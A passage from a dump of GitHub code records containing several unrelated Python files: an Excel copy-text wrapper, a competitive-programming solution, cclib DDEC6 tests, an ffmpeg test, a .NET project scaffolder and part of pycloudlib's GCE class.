valid?{respjson['validate']}\")\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tapantriv/lastday","sub_path":"pyapi/jsontest/jsontestValidateGET.py","file_name":"jsontestValidateGET.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42901046734","text":"#!/usr/bin/env python\n\nfrom markupsafe import Markup\nfrom openpyxl.reader.excel import load_workbook\n\nclass CopyException(Exception):\n pass\n\nclass Error(object):\n \"\"\"\n An error object that can mimic the structure of the COPY data, whether the error happens at the Copy, Sheet or Row level. Will print the error whenever it gets repr'ed. \n \"\"\"\n _error = ''\n\n def __init__(self, error):\n self._error = error\n\n def __getitem__(self, i):\n return self\n \n def __iter__(self):\n return iter([self])\n\n def __len__(self):\n return 1\n\n def __repr__(self):\n return self._error\n\n def __nonzero__(self):\n return False \n\nclass Row(object):\n \"\"\"\n Wraps a row of copy for error handling.\n \"\"\"\n _sheet = None\n _row = []\n _columns = []\n _index = 0\n\n def __init__(self, sheet, row, columns, index):\n self._sheet = sheet\n self._row = row\n self._columns = columns\n self._index = index\n\n def __getitem__(self, i):\n \"\"\"\n Allow dict-style item access by index (column id), or by column name.\n \"\"\"\n if isinstance(i, int):\n if i >= len(self._row):\n return Error('COPY.%s.%i.%i [column index outside range]' % (self._sheet.name, self._index, i))\n\n value = self._row[i]\n\n return Markup(value or '')\n\n if i not in self._columns:\n return Error('COPY.%s.%i.%s [column does not exist in sheet]' % (self._sheet.name, self._index, i))\n\n value = self._row[self._columns.index(i)]\n\n return Markup(value or '')\n\n def __iter__(self):\n return iter(self._row)\n\n def __len__(self):\n return len(self._row)\n\n def __unicode__(self):\n if 'value' in self._columns:\n value = self._row[self._columns.index('value')]\n\n return Markup(value or '')\n\n return Error('COPY.%s.%s [no value column in sheet]' % (self._sheet.name, self._row[self._columns.index('key')])) \n\n def __html__(self):\n return self.__unicode__()\n\n def __nonzero__(self):\n if 'value' in self._columns:\n val = self._row[self._columns.index('value')]\n\n if not val:\n return False \n\n return len(val)\n \n return True\n\nclass Sheet(object):\n \"\"\"\n Wrap copy text, for a single worksheet, for error handling.\n \"\"\"\n name = None\n _sheet = []\n _columns = []\n\n def __init__(self, name, data, columns):\n self.name = name\n self._sheet = [Row(self, [row[c] for c in columns], columns, i) for i, row in enumerate(data)]\n self._columns = columns\n\n def __getitem__(self, i):\n \"\"\"\n Allow dict-style item access by index (row id), or by row name (\"key\" column).\n \"\"\"\n if isinstance(i, int):\n if i >= len(self._sheet):\n return Error('COPY.%s.%i [row index outside range]' % (self.name, i))\n\n return self._sheet[i]\n\n if 'key' not in self._columns:\n return Error('COPY.%s.%s [no key column in sheet]' % (self.name, i))\n\n for row in self._sheet:\n if row['key'] == i:\n return row \n\n return Error('COPY.%s.%s [key does not exist in sheet]' % (self.name, i))\n\n def __iter__(self):\n return iter(self._sheet)\n\n def __len__(self):\n return len(self._sheet)\n\nclass Copy(object):\n \"\"\"\n Wraps copy text, for multiple worksheets, for error handling.\n \"\"\"\n _filename = ''\n _copy = {}\n\n def __init__(self, filename):\n self._filename = filename\n self.load()\n\n def __getitem__(self, name):\n \"\"\"\n Allow dict-style item access by sheet name.\n \"\"\"\n if name not in self._copy:\n return Error('COPY.%s [sheet does not exist]' % name)\n\n return self._copy[name]\n\n def load(self):\n \"\"\"\n Parses the downloaded Excel file and writes it as JSON.\n \"\"\"\n try:\n book = load_workbook(self._filename, data_only=True)\n except IOError:\n raise CopyException('\"%s\" does not exist. Have you run \"fab update_copy\"?' % self._filename)\n\n for sheet in book:\n columns = []\n rows = []\n\n for i, row in enumerate(sheet.rows):\n row_data = [c.internal_value for c in row]\n\n if i == 0:\n columns = row_data \n continue\n\n # If nothing in a row then it doesn't matter\n if all([c is None for c in row_data]):\n continue\n\n rows.append(dict(zip(columns, row_data)))\n\n self._copy[sheet.title] = Sheet(sheet.title, rows, columns)\n\n def json(self):\n \"\"\"\n Serialize the copy as JSON.\n \"\"\"\n import json\n\n obj = {} \n \n for name, sheet in self._copy.items():\n if 'key' in sheet._columns:\n obj[name] = {}\n\n for row in sheet:\n obj[name][row['key']] = row['value']\n else:\n obj[name] = []\n \n for row in sheet:\n obj[name].append(row._row)\n \n return json.dumps(obj)\n","repo_name":"gabelula/zapatistas","sub_path":"marcos/lib/python2.7/site-packages/copytext.py","file_name":"copytext.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42148572859","text":"from collections import Counter\n\nN = int(input())\nA_list = list(map(int, input().split()))\nB_list = list(map(int, input().split()))\nC_list = list(map(int, input().split()))\n\noutput = 0\nB_C_list = []\nfor i in range(N):\n B_C_list.append(B_list[C_list[i] - 1])\n\nB_C_list_counter = Counter(B_C_list)\nfor num in A_list:\n output += B_C_list_counter[num]\n\nprint(output)\n\n\"\"\"\ntime : 10m\ntime complexity : O(N)\nspace complexity : O(N)\n\"\"\"","repo_name":"kobakobashu/atcoder","sub_path":"ABC202/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72785618404","text":"import os\nimport sys\nimport unittest\nimport pytest\nfrom typing import Optional\n\nimport numpy\n\nfrom cclib.method import DDEC6, volume\nfrom cclib.parser import Psi4\nfrom cclib.io import ccread\nfrom cclib.method.calculationmethod import MissingAttributeError\n\nfrom numpy.testing import assert_allclose\n\nfrom ..test_data import getdatafile\n\nclass DDEC6Test(unittest.TestCase):\n \"\"\"DDEC6 method tests.\"\"\"\n\n def setUp(self) -> None:\n super(DDEC6Test, self).setUp()\n self.parse()\n\n def parse(self, molecule_name: Optional[str] = None) -> None:\n if molecule_name is None:\n self.data, self.logfile = getdatafile(Psi4, \"basicPsi4-1.2.1\", [\"water_mp2.out\"])\n else:\n self.data = ccread(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), f\"{molecule_name}.out\")\n )\n\n def testmissingrequiredattributes(self) -> None:\n \"\"\"Is an error raised when required attributes are missing?\"\"\"\n for missing_attribute in DDEC6.required_attrs:\n self.parse()\n vol = volume.Volume((-4, -4, -4), (4, 4, 4), (0.2, 0.2, 0.2))\n delattr(self.data, missing_attribute)\n with pytest.raises(MissingAttributeError):\n trial = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n\n def test_proatom_read(self) -> None:\n \"\"\"Are proatom densities imported correctly?\"\"\"\n\n self.parse()\n vol = volume.Volume((-4, -4, -4), (4, 4, 4), (0.2, 0.2, 0.2))\n\n self.analysis = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n\n refH_den = [\n 2.66407645e-01,\n 2.66407645e-01,\n 2.66407643e-01,\n 2.66407612e-01,\n 2.66407322e-01,\n ] # Hydrogen first five densities\n refH_r = [\n 1.17745807e-07,\n 4.05209491e-06,\n 3.21078677e-05,\n 1.39448474e-04,\n 4.35643929e-04,\n ] # Hydrogen first five radii\n refO_den = [\n 2.98258510e02,\n 2.98258510e02,\n 2.98258509e02,\n 2.98258487e02,\n 2.98258290e02,\n ] # Oxygen first five densities\n refO_r = [\n 5.70916728e-09,\n 1.97130512e-07,\n 1.56506399e-06,\n 6.80667366e-06,\n 2.12872046e-05,\n ] # Oxygen first five radii\n\n assert_allclose(self.analysis.proatom_density[0][0:5], refO_den, rtol=1e-3)\n assert_allclose(self.analysis.proatom_density[1][0:5], refH_den, rtol=1e-3)\n assert_allclose(self.analysis.proatom_density[2][0:5], refH_den, rtol=1e-3)\n\n def test_water_charges(self) -> None:\n \"\"\"Are charges and quantities in each step of DDEC6 algorithm calculated correctly\n for water?\n \n Here, values are compared against `chargemol` calculations.\n Due to the differences in basis set used for calculation and slightly different integration\n grid, some discrepancy is inevitable in the comparison.\n \"\"\"\n\n self.parse()\n # use precalculated fine cube file\n imported_vol = volume.read_from_cube(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"water_fine.cube\")\n )\n\n analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n analysis.calculate()\n\n radial_indices = []\n for atomi in range(len(self.data.atomnos)):\n lst = []\n for radius in [0.05, 0.10, 0.15, 0.20, 0.25]:\n # find closest radius index\n lst.append(numpy.abs(analysis.radial_grid_r[atomi] - radius).argmin())\n radial_indices.append(lst)\n\n # values from `chargemol` calculation\n # which is based on proatomic densities calculated with different basis set.\n # discrepancy comes from the fact that `chargemol` grid & `horton` grid don't exactly match\n # (rtol is adjusted to account for this inevitable discrepancy)\n # STEP 1\n # Check assigned charges.\n assert_allclose(analysis.reference_charges[0], [-0.513006, 0.256231, 0.256775], rtol=0.10)\n # STEP 2\n # Check assigned charges.\n assert_allclose(analysis.reference_charges[1], [-0.831591, 0.415430, 0.416161], rtol=0.20)\n # STEP 3\n # Check integrated charge density (rho^cond(r)) on grid with integrated values (=nelec).\n assert abs(analysis.charge_density.integrate()-analysis.rho_cond.integrate()) < 1\n for atomi in range(len(analysis.data.atomnos)):\n assert abs(analysis._integrate_from_radial([analysis._cond_density[atomi]], [atomi])\n + analysis.reference_charges[-1][atomi]-analysis.data.atomnos[atomi]) < \\\n 0.5\n # Also compare with data from `chargemol`\n # discrepancy comes from the fact that `chargemol` grid and `horton` grid do not exactly match\n assert_allclose(\n analysis.tau[0][radial_indices[0]],\n [0.999846160, 0.999739647, 0.999114037, 0.997077942, 0.994510889],\n rtol=0.10,\n )\n assert_allclose(\n analysis.tau[1][radial_indices[1]],\n [0.864765882, 0.848824620, 0.805562019, 0.760402501, 0.736949861],\n rtol=0.10,\n )\n assert_allclose(\n analysis.tau[2][radial_indices[2]],\n [0.845934391, 0.839099407, 0.803699493, 0.778428137, 0.698628724],\n rtol=0.10,\n )\n # STEP 4-7\n # Check values assigned to u_A\n assert_allclose(\n analysis.u_A,\n [\n [0.572349429, 0.296923935, 0.296520531],\n [0.563154399, 0.291919678, 0.291376710],\n [0.563475132, 0.292007655, 0.291508794],\n [0.565816045, 0.293131322, 0.292902112],\n ],\n atol=0.05,\n )\n # Check assigned charges\n assert_allclose(analysis.fragcharges, [-0.757097, 0.378410, 0.378687], atol=0.2)\n\n @pytest.mark.skipif(sys.version_info > (3, 8), reason=\"This test doesn't converge with newer psi4 versions availiable with python >3.8\")\n def test_chgsum_h2(self) -> None:\n \"\"\" Are DDEC6 charges for hydrogen atoms in nonpolar H2 small as expected?\n \n Using much denser grid (spacing of 0.1 rather than 0.2 which is the cube file included\n in the test) gives [0.00046066, 0.00046066]. \n \"\"\"\n\n self.parse(\"h2\")\n vol = volume.Volume((-2, -2, -2), (2, 2, 2), (0.2, 0.2, 0.2))\n analysis = DDEC6(self.data, vol, os.path.dirname(os.path.realpath(__file__)))\n analysis.calculate()\n\n assert abs(analysis.fragcharges[0]-analysis.fragcharges[1]) < 1e-12\n\n def test_chgsum_co(self) -> None:\n \"\"\" Are DDEC6 charges for carbon monoxide reported as expected?\n \n Deviation from a total of zero (-0.00682) occurs because the integrated value of total\n density (14.006876594937234) is slightly larger than # of electrons.\n \n Using a finer grid reduces this discrepancy.\n \"\"\"\n\n self.parse(\"co\")\n imported_vol = volume.read_from_cube(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"co.cube\")\n )\n analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n analysis.calculate()\n\n assert abs(numpy.sum(analysis.fragcharges)-0) < 1e-2\n assert_allclose(analysis.fragcharges, [0.13221636, -0.13903595], atol=1e-3)\n\n def test_chg_nh3(self) -> None:\n \"\"\" Are DDEC6 charges for ammonia reported as expected?\n \n Deviation from a total of zero (0.026545) occurs because the integrated value of total\n density (9.973453129261163) is slightly smaller than number of electrons.\n \n Using a finer grid reduces this discrepancy.\n \"\"\"\n\n self.parse(\"nh3\")\n imported_vol = volume.read_from_cube(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"nh3.cube\")\n )\n analysis = DDEC6(self.data, imported_vol, os.path.dirname(os.path.realpath(__file__)))\n analysis.calculate()\n\n assert_allclose(\n analysis.fragcharges, [-0.7824003, 0.26854388, 0.26959206, 0.27081123], atol=1e-3\n )\n","repo_name":"cclib/cclib","sub_path":"test/method/testddec.py","file_name":"testddec.py","file_ext":"py","file_size_in_byte":8363,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"52"} +{"seq_id":"29592199020","text":"import main\nfrom math import isclose\ndef test_duration():\n fnin = 'video.mp4'\n fnout1 = 'video_480p.mp4'\n fnout2 = 'video_720p.mp4'\n\n orig_meta = main.ffprobe(fnin)\n orig_duration = float(orig_meta['streams'][0]['duration'])\n test = main.MyProcess()\n test.convert()\n meta_480 = main.ffprobe(fnout1)\n meta_720 = main.ffprobe(fnout2)\n duration_480 = float(meta_480['streams'][0]['duration'])\n duration_720 = float(meta_720['streams'][0]['duration'])\n assert isclose(orig_duration, duration_480, abs_tol=1)\n assert isclose(orig_duration, duration_720, abs_tol=1)\n print('all successful!')\n\ntest_duration()\n","repo_name":"ec500-software-engineering/exercise-2-ffmpeg-zywan","sub_path":"test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29655540363","text":"from microboiler.modules.basemodule import BaseModule\nfrom microboiler.modules.devops.docker import Docker\nfrom microboiler.modules.databases.redis import BuildRedisConnectionString\nfrom microboiler.modules.utils.utils import (InDbQ,to_camelcase,\n FindClientWithName,\n FindDatabaseWithName,\n FindEventBusWithName,\n FindIdentityServiceWithName,\n FindServerWithName,\n FindAllFilesWithExtensionInDirectory)\n\nfrom microboiler.modules.templating.templating import (replace_template_file,\n filter_region,\n filter_region_with_tag,\n filter_sub_region,\n clear_file_region_tags,\n ClearRegionLines,\n Clear_File_Region_Marks)\n\nfrom microboiler.modules.databases.postgre import BuildPostgreConnectionString\nfrom microboiler.modules.databases.mysql import BuildMysqlConnectionString\n\nfrom microboiler.modules.templating.csharp import Csharp\n\nimport os\nimport shutil\n\n\nclass DotnetApi(BaseModule):\n def __init__(self, projectOptions, project_templates_paths, outputPath):\n self.csharp_templater = Csharp(projectOptions,project_templates_paths,outputPath)\n super().__init__(projectOptions, project_templates_paths, outputPath)\n\n def HandleDotnetApiService(self, api_service_options):\n CamelCaseName = to_camelcase(api_service_options['name'])\n apiServicesPath = os.path.join(self.project_templates_paths,'api_services')\n api_template_folder = os.path.join(apiServicesPath,'dotnet_web_api','src')\n srcDir = os.path.join(self.outputPath,'src')\n api_copy_folder = os.path.join(srcDir,'ApiServices',CamelCaseName )\n if os.path.isdir(api_copy_folder):\n shutil.rmtree(api_copy_folder,ignore_errors=True)\n # TODO: Swap shutil operations\n #shutil.copytree(api_template_folder,api_copy_folder,ignore=shutil.ignore_patterns('bin*','obj*'))\n shutil.copytree(api_template_folder,api_copy_folder)\n api_src_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'DotnetWebApi')\n api_src_rename_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src')\n api_csproj_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src','DotnetWebApi.csproj')\n api_csproj_rename_folder = os.path.join(srcDir,'ApiServices',CamelCaseName,'src',CamelCaseName+'.csproj')\n \n if not os.path.isdir(api_src_rename_folder):\n shutil.copytree(api_src_folder,api_src_rename_folder)\n shutil.rmtree( api_src_folder,ignore_errors=True)\n else: \n shutil.rmtree( api_src_rename_folder,ignore_errors=True)\n shutil.copytree(api_src_folder,api_src_rename_folder)\n\n if not os.path.exists(api_csproj_rename_folder):\n shutil.copy(api_csproj_folder,api_csproj_rename_folder)\n os.remove( api_csproj_folder)\n else: \n os.remove(api_csproj_rename_folder)\n shutil.copy(api_csproj_folder,api_csproj_rename_folder)\n\n\n self.HandleDotnetApiCsproj(api_service_options,api_copy_folder)\n self.HandleDotnetApiStartup(api_service_options,api_copy_folder)\n self.HandleDotnetApiProgramFile(api_service_options,api_copy_folder)\n self.HandleDotnetApiDbContext(api_service_options,api_copy_folder)\n self.HandleDotnetApiNameSpaceAndCleaning(api_service_options,api_copy_folder)\n self.HandleDotnetApiDockerFile(api_service_options,api_copy_folder)\n\n docker_config = self.HandleDotnetApiDockerCompose(api_service_options,api_copy_folder)\n docker_instance = Docker.getInstance()\n docker_instance.AddService(api_service_options['name'], docker_config)\n\n def HandleDotnetApiCsproj(self, dotnet_service, api_copy_folder):\n print ('Handle DotnetApi Csproj File')\n api_csproj_path = os.path.join(api_copy_folder,\n 'src',\n to_camelcase(dotnet_service['name'])+'.csproj')\n # Handle Host Application\n self.csharp_templater.HandleCsprojLogging(dotnet_service,api_csproj_path)\n self.csharp_templater.HandleCsprojDatabase(dotnet_service,api_csproj_path)\n self.csharp_templater.HandleCsprojEventbus(dotnet_service,api_csproj_path)\n def BuildConnStringForDotnetApi(self, dotnet_options):\n database_instance_name = dotnet_options['database']['provider']\n database_instance = FindDatabaseWithName(self.projectOptions, database_instance_name)\n database_type = database_instance['type']\n connection_string ='' \n user = 'doom'\n password = 'machine'\n if database_type=='mysql' or database_type=='postgresql':\n if 'username' in database_instance:\n user = database_instance['username']\n if 'password' in database_instance:\n password = database_instance['password']\n if database_type == 'mysql': \n connection_string, connection_string_dev = BuildMysqlConnectionString(database_instance['name'],dotnet_options['name'],user,password) \n elif database_type == 'postgresql':\n connection_string, connection_string_dev = BuildPostgreConnectionString(database_instance['name'],dotnet_options['name'],user,password) \n \n return connection_string , connection_string_dev\n\n def HandleDotnetApiStartup(self, dotnet_service, api_copy_folder):\n print ('Handle DotnetApi Startup.cs File')\n api_startup_path = os.path.join(api_copy_folder,\n 'src',\n 'Startup.cs')\n \n self.csharp_templater.HandleCSharpDatabase(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpCache(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpEventbus(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpLogging(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpServer(dotnet_service,api_startup_path)\n self.csharp_templater.HandleCSharpSwagger(dotnet_service,api_startup_path)\n # Set DBContext Name\n CamelCaseName = to_camelcase(dotnet_service['name'])\n replaceDict = {\n 'NameContext': CamelCaseName.replace('.','') + 'Context' \n }\n if 'database' in dotnet_service:\n \n conn_string, conn_string_dev = self.BuildConnStringForDotnetApi(dotnet_service)\n replaceDict['{{database:connectionString}}'] = conn_string\n replaceDict['{{database:connectionString-dev}}'] = conn_string_dev\n\n if 'cache' in dotnet_service:\n if dotnet_service['cache']['type'] == 'redis':\n redis_instance = FindDatabaseWithName(self.projectOptions, dotnet_service['cache']['redis_options']['redis_server'])\n if redis_instance is None:\n print ('Warning: Redis instance could not found. Configuration left default')\n else:\n redis_conn_string, redis_conn_string_dev = BuildRedisConnectionString(redis_instance)\n replaceDict['{{redis_options:connection}}'] = redis_conn_string\n replaceDict['{{redis_options:connection-dev}}'] = redis_conn_string_dev\n if 'redis_instance_name' in dotnet_service['cache']['redis_options']:\n replaceDict['{{redis_options:instance_name}}'] = dotnet_service['cache']['redis_options']['redis_instance_name']\n if 'authorization' in dotnet_service:\n issuer = dotnet_service['authorization']['issuer']\n if issuer is None:\n print ('Error: Identity Issuer for '+dotnet_service['name']+' is required')\n identity_instance = FindIdentityServiceWithName(self.projectOptions, issuer)\n if identity_instance is None:\n print ('Error: Identity Service Instance for '+dotnet_service['name']+' could not found')\n else:\n replaceDict['{{authorization:api_name}}'] = dotnet_service['name'] \n replaceDict['{{authorization:authority}}'] = str.lower(identity_instance['name'])+'.localhost'\n replaceDict['{{authorization:authority-dev}}'] = 'http://localhost:'+str(identity_instance['port'])\n if 'api_secret' in dotnet_service['authorization']:\n replaceDict['{{authorization:api_secret}}'] = dotnet_service['authorization']['secrets'][0]\n else:\n # Set Default Secret\n replaceDict['{{authorization:api_secret}}'] = 'secret'\n\n replace_template_file(api_startup_path,replaceDict)\n\n def HandleDotnetApiProgramFile(self, dotnet_service, api_copy_folder):\n api_program_path = os.path.join(api_copy_folder,\n 'src',\n 'Program.cs')\n\n self.csharp_templater.HandleCSharpLogging(dotnet_service,api_program_path)\n def HandleDotnetApiDbContext(self, dotnet_service, api_copy_folder):\n dbcontext_path = os.path.join(api_copy_folder,\n 'src',\n 'Data',\n 'NameContext.cs')\n CamelCaseDbName = to_camelcase(dotnet_service['name']).replace('.','') + 'Context'\n if 'database' in dotnet_service:\n if os.path.exists(dbcontext_path):\n dbcontext_rename_path = os.path.join(api_copy_folder,\n 'src',\n 'Data',\n CamelCaseDbName+'.cs')\n shutil.copy(dbcontext_path, dbcontext_rename_path)\n os.remove(dbcontext_path)\n replaceDict = {\n 'NameContext': CamelCaseDbName\n }\n replace_template_file(dbcontext_rename_path,replaceDict)\n else:\n remove_data_folder_path = os.path.join(api_copy_folder,\n 'src',\n 'Data')\n shutil.rmtree(remove_data_folder_path)\n rm_files = ['migrations.sh','updatedb.sh','dropdb.sh','migrations.dev.sh','updatedb.dev.sh','dropdb.dev.sh']\n for rm_file in rm_files:\n rm_path = os.path.join(api_copy_folder,rm_file)\n os.remove(rm_path)\n docker_file = os.path.join(api_copy_folder,\n 'Dockerfile')\n filter_region_with_tag(docker_file,'database')\n \n def HandleDotnetApiNameSpaceAndCleaning(self, dotnet_service, api_copy_folder):\n src_path = os.path.join(api_copy_folder,'src')\n file_clean_paths = FindAllFilesWithExtensionInDirectory(src_path,('.cs','.csproj'))\n CamelCaseServiceName = to_camelcase(dotnet_service['name'])\n self.csharp_templater.ReplaceDotnetNameSpaces(file_clean_paths,'DotnetWebApi',CamelCaseServiceName)\n ClearRegionLines(file_clean_paths)\n def HandleDotnetApiDockerFile(self, dotnet_service, api_copy_folder):\n docker_file_path = os.path.join(api_copy_folder,'Dockerfile')\n docker_replace_dict = {}\n docker_replace_dict['{{port}}'] = str(dotnet_service['port'])\n docker_replace_dict['{{project_name}}'] = to_camelcase(dotnet_service['name'])\n replace_template_file(docker_file_path,docker_replace_dict)\n if 'database' in dotnet_service:\n ef_shell_replace_dict = {\n '{{ProjectName}}' : to_camelcase(dotnet_service['name']),\n '{{DatabaseContextName}}' : to_camelcase(dotnet_service['name']).replace('.','') + 'Context'\n }\n shell_file_paths = ['migrations.sh','updatedb.sh','dropdb.sh','migrations.dev.sh','updatedb.dev.sh','dropdb.dev.sh']\n for path in shell_file_paths:\n f_path = os.path.join(api_copy_folder,path)\n replace_template_file(f_path,ef_shell_replace_dict)\n\n def HandleDotnetApiDockerCompose(self, dotnet_service,api_copy_folder):\n docker_props = {\n 'image': dotnet_service['name'].lower(),\n 'build': {\n 'context': 'src/ApiServices/'+to_camelcase(dotnet_service['name'])+'/',\n 'dockerfile': 'Dockerfile'\n },\n 'restart': 'on-failure',\n 'ports': [],\n 'links': [],\n 'depends_on':[],\n 'networks':['localnet'], \n }\n if 'database' in dotnet_service:\n docker_props['links'].append(dotnet_service['database']['provider'])\n docker_props['depends_on'].append(dotnet_service['database']['provider'])\n if 'port' in dotnet_service:\n docker_props['ports'].append(str(dotnet_service['port'])+':'+str(dotnet_service['port']))\n eventbus_enabled = 'eventbus' in dotnet_service\n if eventbus_enabled:\n eb_provider = dotnet_service['eventbus']['provider'] \n docker_props['links'].append(eb_provider)\n docker_props['depends_on'].append(eb_provider)\n\n return docker_props\n ","repo_name":"DooMachine/MicroBoiler","sub_path":"microboiler/modules/services/dotnetapi.py","file_name":"dotnetapi.py","file_ext":"py","file_size_in_byte":12817,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"27519123534","text":"# This file is part of pycloudlib. See LICENSE file for license information.\n\"\"\"GCE Cloud type.\n\nThis is an initial implementation of the GCE class. It enables\nauthentication into the cloud, finding an image, and launching an\ninstance. It however, does not allow any further actions from occurring.\n\"\"\"\n\nimport logging\nimport os\nimport time\nfrom itertools import count\nfrom typing import Any, MutableMapping, Optional\n\nimport googleapiclient.discovery\n\nfrom pycloudlib.cloud import BaseCloud, ImageType\nfrom pycloudlib.config import ConfigFile\nfrom pycloudlib.errors import (\n CloudSetupError,\n ImageNotFoundError,\n PycloudlibError,\n)\nfrom pycloudlib.gce.instance import GceInstance\nfrom pycloudlib.gce.util import get_credentials, raise_on_error\nfrom pycloudlib.util import UBUNTU_RELEASE_VERSION_MAP, subp\n\nlogging.getLogger(\"googleapiclient.discovery\").setLevel(logging.WARNING)\n\n\nclass GCE(BaseCloud):\n \"\"\"GCE Cloud Class.\"\"\"\n\n _type = \"gce\"\n\n def __init__(\n self,\n tag: str,\n timestamp_suffix: bool = True,\n config_file: Optional[ConfigFile] = None,\n *,\n credentials_path: Optional[str] = None,\n project: Optional[str] = None,\n region: Optional[str] = None,\n zone: Optional[str] = None,\n service_account_email: Optional[str] = None,\n ):\n \"\"\"Initialize the connection to GCE.\n\n Args:\n tag: string used to name and tag resources with\n timestamp_suffix: bool set True to append a timestamp suffix to the\n tag\n config_file: path to pycloudlib configuration file\n credentials_path: path to credentials file for GCE\n project: GCE project\n region: GCE region\n zone: GCE zone\n service_account_email: service account to bind launched\n instances to\n \"\"\"\n super().__init__(\n tag,\n timestamp_suffix,\n config_file,\n required_values=[credentials_path, project],\n )\n\n self._log.debug(\"logging into GCE\")\n\n self.credentials_path = \"\"\n if credentials_path:\n self.credentials_path = credentials_path\n elif \"GOOGLE_APPLICATION_CREDENTIALS\" in os.environ:\n self.credentials_path = os.environ[\n \"GOOGLE_APPLICATION_CREDENTIALS\"\n ]\n elif \"credentials_path\" in self.config:\n self.credentials_path = os.path.expandvars(\n os.path.expanduser(self.config[\"credentials_path\"])\n )\n\n credentials = get_credentials(self.credentials_path)\n\n if not project:\n if \"project\" in self.config:\n project = self.config[\"project\"]\n elif \"GOOGLE_CLOUD_PROJECT\" in os.environ:\n project = os.environ[\"GOOGLE_CLOUD_PROJECT\"]\n else:\n command = [\"gcloud\", \"config\", \"get-value\", \"project\"]\n exception_text = (\n \"Could not obtain GCE project id. Set it in the \"\n \"pycloudlib config or setup the gcloud cli.\"\n )\n try:\n result = subp(command, rcs=())\n except FileNotFoundError as e:\n raise CloudSetupError(exception_text) from e\n if not result.ok:\n exception_text += \"\\nstdout: {}\\nstderr: {}\".format(\n result.stdout, result.stderr\n )\n raise CloudSetupError(exception_text)\n project = result.stdout\n\n # disable cache_discovery due to:\n # https://github.com/google/google-api-python-client/issues/299\n self.compute = googleapiclient.discovery.build(\n \"compute\",\n \"v1\",\n cache_discovery=False,\n credentials=credentials,\n )\n region = region or self.config.get(\"region\") or \"us-west2\"\n zone = zone or self.config.get(\"zone\") or \"a\"\n self.project = project\n self.region = region\n self.zone = \"%s-%s\" % (region, zone)\n self.instance_counter = count()\n self.service_account_email = service_account_email or self.config.get(\n \"service_account_email\"\n )\n\n def released_image(\n self, release, *, image_type: ImageType = ImageType.GENERIC, **kwargs\n ):\n \"\"\"ID of the latest released image for a particular release.\n\n Args:\n release: The release to look for\n\n Returns:\n A single string with the latest released image ID for the\n specified release.\n \"\"\"\n return self.daily_image(release=release, image_type=image_type)\n\n def _get_project(self, image_type: ImageType):\n return (\n \"ubuntu-os-cloud-devel\"\n if image_type == ImageType.GENERIC\n else \"ubuntu-os-pro-cloud\"\n )\n\n def _get_name_filter(self, release: str, image_type: ImageType):\n if image_type == ImageType.GENERIC:\n return \"daily-ubuntu-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n if image_type == ImageType.PRO:\n return \"ubuntu-pro-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n if image_type == ImageType.PRO_FIPS:\n return \"ubuntu-pro-fips-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n raise ValueError(\"Invalid image_type: {}\".format(image_type.value))\n\n def _query_image_list(\n self, release: str, project: str, name_filter: str, arch: str\n ):\n \"\"\"Query full list of images.\n\n image list API docs:\n https://googleapis.github.io/google-api-python-client/docs/dyn/compute_v1.images.html#list\n\n The image list API doesn't allow filtering and sorting in one request\n so we need to do one of those locally.\n Filtering via the API results in fewer requests on average than\n sorting via the API.\n So we filter via the API and loop through all pages to get the full\n image list matching that filter.\n 500 is the maximum allowed page size\n Then we can sort locally and grab the latest image.\n\n Args:\n release: string, Ubuntu release to look for\n project: GCE project\n name_filter: name to filter with\n arch: images' architecture\n\n Returns:\n list of images matching the given filters\n \"\"\"\n filter_string = \"(name={}) AND (architecture={})\".format(\n name_filter, arch.upper()\n )\n\n # SPECIAL CASE\n # Google didn't start including architecture in image descriptions\n # until after xenial stopped getting published\n # All xenial images are x86_64, so:\n # 1. we can return early for non-x86_64 xenial queries\n # 2. for xenial + x86_64 we don't include the architecture in the\n # filter\n if release == \"xenial\":\n if arch != \"x86_64\":\n return []\n filter_string = \"name={}\".format(name_filter)\n\n image_list = []\n page_token = \"\"\n reqs = 0\n while page_token is not None:\n image_list_result = (\n self.compute.images()\n .list(\n project=project,\n filter=filter_string,\n maxResults=500,\n pageToken=page_token,\n )\n .execute()\n )\n reqs += 1\n image_list += image_list_result.get(\"items\", [])\n page_token = image_list_result.get(\"nextPageToken\", None)\n\n self._log.debug(\n (\n 'Fetched entire image list (%i results) matching \"%s\" in %i'\n \" requests\"\n ),\n len(image_list),\n filter_string,\n reqs,\n )\n\n return image_list\n\n def daily_image(\n self,\n release: str,\n *,\n arch: str = \"x86_64\",\n image_type: ImageType = ImageType.GENERIC,\n **kwargs,\n ):\n \"\"\"Find the id of the latest image 